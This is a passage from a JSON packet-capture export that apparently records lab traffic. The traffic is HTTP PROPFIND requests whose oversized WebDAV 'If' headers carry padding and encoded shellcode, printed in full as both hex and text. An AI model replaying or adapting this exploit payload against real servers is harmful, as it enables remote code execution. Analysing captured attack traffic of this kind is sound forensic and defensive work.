B9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "598"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.910002000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.910002000",
|
||
"frame.time_delta": "0.000064000",
|
||
"frame.time_delta_displayed": "0.003412000",
|
||
"frame.time_relative": "17.160942000",
|
||
"frame.number": "605",
|
||
"frame.len": "255",
|
||
"frame.cap_len": "255",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "241",
|
||
"ip.id": "0x0000886d",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000a832",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "33663",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "33663",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "83",
|
||
"tcp.len": "189",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2513822873",
|
||
"tcp.nxtseq": "1638",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "536404920",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000aaa7",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:ad:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:ad:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868717",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000236000",
|
||
"tcp.analysis.bytes_in_flight": "1637",
|
||
"tcp.analysis.push_bytes_sent": "1637"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000517000",
|
||
"tcp.time_delta": "0.000064000"
|
||
},
|
||
"tcp.payload": "4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "604",
|
||
"tcp.segment": "605",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1637",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:58:59:76:67:48:4f:6d:69:4c:4a:5a:4b:66:6a:68:56:52:47:51:68:72:46:76:4d:56:61:46:6a:79:50:7a:6a:4f:77:51:77:50:4c:4a:59:59:44:6f:59:6b:48:6e:66:42:68:77:46:76:50:65:73:73:47:73:50:52:70:65:e6:ad:9a:e7:a5:b7:e5:a1:96:e6:89:a2:e4:a1:ae:e4:99:97:e6:b1:a6:e4:95:ae:e4:95:ba:e5:a5:85:e5:99:aa:e6:ad:a8:e7:91:b3:e7:89:97:e7:8d:b8:e7:a9:b0:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:99:94:e4:85:82:e5:81:90:e4:9d:82:e4:b5:96:e6:a9:90:e5:85:a4:e5:99:b6:e6:99:a4:e6:b9:b4:e6:85:ba:e6:b9:8a:e7:8d:8d:e7:91:83:e4:b9:84:e4:b1:8e:e6:8d:87:e7:a9:b3:e5:9d:93:e4:9d:8a:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:49:56:70:59:4e:65:51:4e:53:41:63:6b:6e:4a:4e:45:46:61:78:53:51:5a:4b:6d:4f:45:6f:43:42:4d:4a:4a:74:66:67:76:4c:77:6d:6f:43:63:5a:6e:6c:4e:44:72:49:4c:77:72:55:73:58:52:42:4f:7a:58:47:69:76:e5:9d:86:e5:81:b7:e4:91:af:e7:89:90:e6:b1:84:e6:95:a1:e7:a9:a6:e4:95:a2:e6:a1:ac:e7:89:81:e5:a1:88:e6:8d:b6:e7:8d:89:e4:91:b2:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:9d:8b:e6:89:a9:e4:a9:84:e7:a1:9a:e1:8f:80:e6:a0:83:e7:95:8d:e4:a9:b6:e7:95:9a:e7:a1:b3:e5:a5:95:e4:8d:ad:e6:b1:85:e5:81:b6:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/XYvgHOmiLJZKfjhVRGQhrFvMVaFjyPzjOwQwPLJYYDoYkHnfBhwFvPessGsPRpe<70><65><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/IVpYNeQNSAcknJNEFaxSQZKmOEoCBMJJtfgvLwmoCcZnlNDrILwrUsXRBOzXGiv<69><76><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "607"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.915303000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.915303000",
|
||
"frame.time_delta": "0.000009000",
|
||
"frame.time_delta_displayed": "0.005301000",
|
||
"frame.time_relative": "17.166243000",
|
||
"frame.number": "616",
|
||
"frame.len": "253",
|
||
"frame.cap_len": "253",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "239",
|
||
"ip.id": "0x00006ff8",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000c0a9",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "40583",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "40583",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "84",
|
||
"tcp.len": "187",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2225044276",
|
||
"tcp.nxtseq": "1636",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3927776261",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
